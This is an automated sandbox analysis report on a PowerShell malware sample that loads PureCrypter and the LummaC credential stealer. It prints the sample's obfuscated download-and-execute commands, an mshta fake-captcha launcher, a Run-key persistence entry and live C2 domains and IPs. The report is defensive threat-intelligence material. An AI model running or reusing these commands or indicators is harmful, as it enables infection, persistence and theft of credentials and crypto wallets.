Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00.ps1

Overview

General Information

Sample name:00.ps1
Analysis ID:1591695
MD5:8067bbe2706cbd02f6885c17c186e6cd
SHA1:2d8e307684b8b5f8a8a68d5892db6879eaa69b25
SHA256:44be296b2cbb2b21f81aa170020314425962a7e935678fbab1f4845e953aeecb
Infos:

Detection

PureCrypter, LummaC, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected PureCrypter Trojan
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 6260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • mshta.exe (PID: 6112 cmdline: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 8332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • RegSvcs.exe (PID: 8988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • RegSvcs.exe (PID: 8996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • powershell.exe (PID: 8400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • RegSvcs.exe (PID: 9072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • powershell.exe (PID: 8460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • RegSvcs.exe (PID: 9108 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • RegSvcs.exe (PID: 9116 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PureCrypterAccording to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["savorraiykj.lat", "kickykiduz.lat", "miniatureyu.lat", "finickypwk.lat", "washyceehsu.lat", "curtainykeo.lat", "leggelatez.lat", "shoefeatthe.lat", "bloodyswif.lat"], "Build id": "atxOT1--traff12"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: powershell.exe PID: 8332JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 8400JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 8460JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: RegSvcs.exe PID: 8996JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 2 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_8332.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_8400.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_8460.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, CommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6260, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, ProcessId: 6112, ProcessName: mshta.exe
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8332, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ProcessId: 6260, ProcessName: powershell.exe
                  Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta vbscript:close(CreateObject("WScript.Shell").Run("powershell $L='(New-Object Net.We';$Y='bClient).Downlo';$V='adString(''http://92.255.57.112/1/2.png'')';$F=I`E`X ($L,$Y,$V -Join '')|I`E`X",0)), EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 8996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\(Default)
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ProcessId: 6260, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:41.878148+010020283713Unknown Traffic192.168.11.204977323.47.27.74443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:46.835545+010020355951Domain Observed Used for C2 Detected92.255.57.11256001192.168.11.2049774TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:40.713938+010020591891Domain Observed Used for C2 Detected192.168.11.20501471.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:40.609977+010020592211Domain Observed Used for C2 Detected192.168.11.20642361.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:41.453265+010020591911Domain Observed Used for C2 Detected192.168.11.20505051.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:41.140323+010020591991Domain Observed Used for C2 Detected192.168.11.20508411.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:40.927416+010020592011Domain Observed Used for C2 Detected192.168.11.20537991.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:41.034271+010020592031Domain Observed Used for C2 Detected192.168.11.20627571.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:41.243846+010020592071Domain Observed Used for C2 Detected192.168.11.20590501.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:41.349146+010020592091Domain Observed Used for C2 Detected192.168.11.20636161.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:40.821663+010020592111Domain Observed Used for C2 Detected192.168.11.20492191.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:18:42.232242+010028586661Domain Observed Used for C2 Detected192.168.11.204977323.47.27.74443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://92.255.57.112/1/3.pngAvira URL Cloud: Label: malware
                  Source: bloodyswif.latAvira URL Cloud: Label: malware
                  Source: curtainykeo.latAvira URL Cloud: Label: malware
                  Source: leggelatez.latAvira URL Cloud: Label: malware
                  Source: miniatureyu.latAvira URL Cloud: Label: malware
                  Source: kickykiduz.latAvira URL Cloud: Label: malware
                  Source: finickypwk.latAvira URL Cloud: Label: malware
                  Source: shoefeatthe.latAvira URL Cloud: Label: malware
                  Source: https://washyceehsu.lat/Avira URL Cloud: Label: malware
                  Source: washyceehsu.latAvira URL Cloud: Label: malware
                  Source: http://92.255.57.112/1/2.pngAvira URL Cloud: Label: malware
                  Source: https://view-reserve.com/recaptcha-verify.html...Avira URL Cloud: Label: malware
                  Source: savorraiykj.latAvira URL Cloud: Label: malware
                  Source: http://92.255.57.112/1/1.pngAvira URL Cloud: Label: malware
                  Source: https://view-reserve.com/recaptcha-verify.htmlAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 14.2.RegSvcs.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["savorraiykj.lat", "kickykiduz.lat", "miniatureyu.lat", "finickypwk.lat", "washyceehsu.lat", "curtainykeo.lat", "leggelatez.lat", "shoefeatthe.lat", "bloodyswif.lat"], "Build id": "atxOT1--traff12"}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Sample uses string decryption to hide its real strings
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: finickypwk.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shoefeatthe.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: savorraiykj.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: kickykiduz.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: miniatureyu.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: leggelatez.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: washyceehsu.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bloodyswif.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curtainykeo.lat
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: atxOT1--traff12
                  Source: unknownHTTPS traffic detected: 92.255.57.120:443 -> 192.168.11.20:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.47.27.74:443 -> 192.168.11.20:49773 version: TLS 1.2
                  Source: Binary string: \??\C:\Windows\System.Core.pdbpdbcr source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb91b8c6 source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbl source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbsM source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdbFiles source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbgz source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdb=C:\P source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.58452952666.0000025BB01EF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb 158 Stepping 13, GenuineIntelPROCES source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb[ source: powershell.exe, 00000006.00000002.58452952666.0000025BB01DD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Y]xn.pdb source: powershell.exe, 00000008.00000002.58462627995.00000199FF735000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: #.dll.pdb source: powershell.exe, 00000004.00000002.58302816703.0000015E92C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58398618045.0000015EAB270000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.00000199803D4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdbO source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF2D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbo source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdbP source: powershell.exe, 00000008.00000002.58462627995.00000199FF735000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbP source: powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb( source: powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb+$m source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbO$I source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbam F( source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb4 source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58451615184.0000025BAFF33000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF720000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbuo source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.58452952666.0000025BB01BB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32ersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFAE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF430000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000008.00000002.58457730531.00000199FF430000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.58300790959.0000015E90C18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58451615184.0000025BAFF33000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF79C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF720000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbwA source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbs source: powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dows\System.Core.pdb source: powershell.exe, 00000008.00000002.58457730531.00000199FF430000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbe source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdbOlC source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: powershell.exe, 00000004.00000002.58302816703.0000015E92C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58302816703.0000015E92D73000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58296660265.0000000000402000.00000040.00000400.00020000.00000000.sdmp
